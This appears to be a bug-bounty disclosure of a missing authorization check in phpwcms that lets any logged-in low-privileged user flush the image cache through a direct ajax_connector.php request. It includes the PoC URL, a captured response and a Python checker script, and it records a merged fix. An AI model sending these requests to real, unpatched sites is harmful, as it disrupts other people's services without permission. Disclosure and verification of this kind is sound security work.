Forced Browsing in slackero/phpwcms

Valid

Reported on Sep 1st 2021


✍️ Description

The image cache can be flushed by any authenticated, low-privileged user: the flush_image_cache action of include/inc_act/ajax_connector.php is reachable by direct request and is not restricted to administrators.

🕵️‍♂️ Proof of Concept

  • Register a low-privileged user without any administrator access.
  • Log in as that low-privileged user.
  • Open the following URL:
    https://[SERVERADDRESS]/include/inc_act/ajax_connector.php?action=flush_image_cache&value=1
  • The server answers 200 OK with the JSON body {"file_count":0,"status":"ok"}, which means the image cache has been flushed. (Check the body, not just the status code: a login page or error page could also be served with 200.)
HTTP/1.1 200 OK
Date: Wed, 01 Sep 2021 10:12:53 GMT
Server: Apache/2.4.46 (Win64) OpenSSL/1.1.1h PHP/8.0.1
X-Powered-By: PHP/8.0.1
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Content-Length: 30
Connection: close
Content-Type: application/json

{"file_count":0,"status":"ok"}
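The steps above, turned into a repeatable check. This is an added example, not the reporter's or the phpwcms project's code. It assumes the connector path quoted in the report, a placeholder base URL (PHPWCMS_BASE) and a session cookie (SESSION_COOKIE) for an already logged-in low-privileged user; the login step itself is not automated. The verdict logic is the point: only a 200 whose JSON body says "status":"ok" counts as a successful flush, a 401/403 means the endpoint is now protected, and anything else (including a 200 carrying HTML) is inconclusive.

```python
"""Verify whether flush_image_cache is reachable by a low-privileged user.

Added example, not code from the original report or from phpwcms.
Assumptions (replace before use):
  PHPWCMS_BASE   - site root of the phpwcms installation
  SESSION_COOKIE - PHPSESSID of a logged-in, non-admin user
"""
import json
import urllib.error
import urllib.request
from urllib.parse import urlencode

PHPWCMS_BASE = "https://example.invalid"            # assumption: target site root
ENDPOINT = "/include/inc_act/ajax_connector.php"    # path from the report
SESSION_COOKIE = "PHPSESSID=replace-me"             # assumption: low-priv session


def build_request(base, cookie, action="flush_image_cache", value="1"):
    """Build the exact GET the report describes, carrying the user's session."""
    query = urlencode({"action": action, "value": value})
    url = f"{base}{ENDPOINT}?{query}"
    return urllib.request.Request(
        url, headers={"Cookie": cookie, "Accept": "application/json"}
    )


def interpret_response(status, body):
    """Classify the server's answer.

    Returns (verdict, file_count) where verdict is one of:
      "flushed"      - 200 and JSON "status" == "ok": the cache was flushed
                       (file_count is whatever the server reported, 0 in the
                       report's capture)
      "denied"       - 401 or 403: an authorization check is in place
      "inconclusive" - anything else; a 200 with an HTML body (e.g. a login
                       page served in place of the action) proves nothing
    """
    if status in (401, 403):
        return "denied", None
    if status != 200:
        return "inconclusive", None
    try:
        data = json.loads(body)
    except ValueError:  # json.JSONDecodeError subclasses ValueError
        return "inconclusive", None
    if isinstance(data, dict) and data.get("status") == "ok":
        return "flushed", data.get("file_count")
    return "inconclusive", None


def check(base=PHPWCMS_BASE, cookie=SESSION_COOKIE):
    """Send the request and return (verdict, file_count)."""
    req = build_request(base, cookie)
    try:
        with urllib.request.urlopen(req, timeout=10) as resp:
            status = resp.status
            body = resp.read().decode("utf-8", "replace")
    except urllib.error.HTTPError as err:
        # urllib raises on 4xx/5xx; the status and body are still needed
        status = err.code
        body = err.read().decode("utf-8", "replace")
    return interpret_response(status, body)


if __name__ == "__main__":
    verdict, count = check()
    print(f"verdict={verdict} file_count={count}")
    # A "flushed" verdict from a non-admin session reproduces the finding;
    # "denied" is the expected result after the fix.
```

Run it twice if you need proof beyond the JSON: once as the low-privileged user and once with a fresh admin session that first uploads an image, so that a non-zero file_count makes the flush visible.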

💥 Impact

Any authenticated user, regardless of privilege level, can flush the cache of the application's image management simply by requesting the action URL directly. The cached image files are discarded and must be regenerated, and because nothing stops the request from being repeated, a low-privileged account can keep the cache permanently empty. The root cause is a missing authorization check on the flush_image_cache action, not a flaw in the cache itself.

Timeline

  • We have contacted a member of the slackero/phpwcms team and are waiting to hear back (3 months ago)
  • Oliver Georgi validated this vulnerability (3 months ago)
  • TheLabda has been awarded the disclosure bounty
  • The fix bounty is now up for grabs
  • Oliver Georgi confirmed that a fix has been merged on 3bc4e7 (3 months ago)
  • Oliver Georgi has been awarded the fix bounty